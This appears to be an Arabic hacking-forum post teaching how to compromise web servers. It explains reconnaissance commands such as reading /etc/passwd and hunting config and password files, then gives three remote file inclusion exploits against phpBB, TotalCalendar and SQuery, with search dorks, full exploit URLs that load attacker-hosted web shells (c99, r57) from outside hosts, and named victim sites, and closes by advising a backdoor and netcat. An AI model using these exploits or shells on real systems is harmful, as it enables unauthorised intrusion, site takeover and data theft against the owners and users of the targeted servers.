[center]ان اختراق السيرفرات اهم بكثير من اختراق المنتديات فاختراق السيرفرات فيه مواقع كثيره طيب بيسال واحد كيف اخترق السيرفر ووين الثغرات.................................. سنباد بثغرات اللى تسطيع من خلاله رفع شل او ايجاد شل الموقع نفسه ولكن قبل ذلك نعرص لكم اهم اوامر الشل ومعناها وليس فقط النسخ اللصق ياخي العزيز اللينكس سهل ولكن تم تضخيمه بقصد وبغير قصد ولكن والله سهل نبدا الاوامر 1-find / -name config.php طيب انا ابغى افهم الامر هذا مش لاجل بس نسخ لصق بل افهم وش معناه معنى الامر ايجاد الملفات اللى فيه كونفق مثل مجلات النيوك والمنتديات وغيرها ومراكز التحميل 2-ls /var/named is لعرض محتويات المجلد في نظاما ما var من فريشين اي منوع مواقع منوعه اي معنى الامر عرض كل مافي السيرفر من مواقع 3-cat لعرض محتو مجلدات 4- home للمجلد الاصلى في السيرفر 5-pwd و is تعمل نفس العمل تعرض محتوى السيرفر ومكان تواجدك 6-chmod : لتغير تصريح دخول ملف معين ففي بعض الملفات لاتقبل فقط الا القراءه لكن مع تغير تصريحه الى 777 يقبل 7-passwd : لانشاء كملة سر او تغيره لانشاء كلمه السر او ايجاده طيب اخذنا فكره عامه على ماتعني ما1ذا يهمني من الاوامر في حاله اني ابغى اخترق السيرفر بسرعه اكتب الامر الاتي find / -name service.pwd service.pwd يعني مكان تواجد الباسورد المشفر 8-cat /etc/passwd وهو لمعرفة كل الـيوزر والمواقع والمسارات على السيرفر طيب انا الان عرفت اوامر الشل ابغى ثغرات توصلني الى شل الموقع او ارفع الملف
اول ثغره ......................................... بسم الله للبحث في جوجل أو الـياهو أو أي محرك بحث آخر : اكتب : "Powered by phpBB" inurl:activity.php --------------------------------------------------------- الإسمتثمار : http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt http://www.conservativelife.com/boards/language/lang_english/lang_activity.php?phpbb_root_path=http%3A%2F%2Fwww .members.lycos.co.uk%2Fbourair%2Fc99.txt%3FID&act= ls&d=%2Fhome%2Fcdsmith%2Fpublic_html%2F&sort=0a وهذا هديه من خوكم صقر غامد الثغره الثانيه........................................... ....................... "Powered by TotalCalendar" راح يطلع معك مواقع كتير نختار منهم واحد مثلا هذا http://www.pantherpta.org/ اضع خلفة مباشرة هذا الكود index.php?inc_dir=http://rst.void.ru/download/r57shell.txt?&ls%20-laF ليصبح هكذا http://www.pantherpta.org/index.php?...txt?&ls%20-laF الثغره الثالثه........................................... .................................................. ... اول شي اول شي نروح للقوقل www.GoOgLe.CoM ونبحث عن : كود: SQuery 4.5 راح نلاقي مواقع كتيرة (( نصهم سكروا الثغرة ورة يومين من اكتشافها معليش )) بس انا جبتلكم موقع للتجربة http://www.ucsserver.com المهم حتقولي كيف نستثمر الثغرة ؟؟ حقولك بعد رابط الموقع تضيف كود: SQuery/lib/armygame.php?libpath=http://members.lycos.co.uk/dmarhackerz /ss.txt? مع تغير ال http://members.lycos.co.uk/dmarhackerz/ss.txt الى رابط الشيل تبعك بس لازم يكون امتداد الشيل txt يعني مثال : عندي شيل c99.php روح نشيل .php ونحط كود: .txt وترفعه على موقعك وحطها برابط الاستغلال ملاحطة مهمة ((( بعد رابط الشيل تبعك لازم تحط علامة ؟ ))) اوا فكره اني اخترق السيرفر كله بمواقعه اولا لازم ترفع باكدور الى السيرفر وكل باكدور له بورت معين مثل الباكدور الايراني له بورت 2121 طيب مافائده الباكدرو هو يجعلك متخفى وكذلك يعطيك صلاحياتك وصلاحيات اوسع طيب وبعدين ماذا تفعل ..................................... تنزل برنامج النت كات للتنصت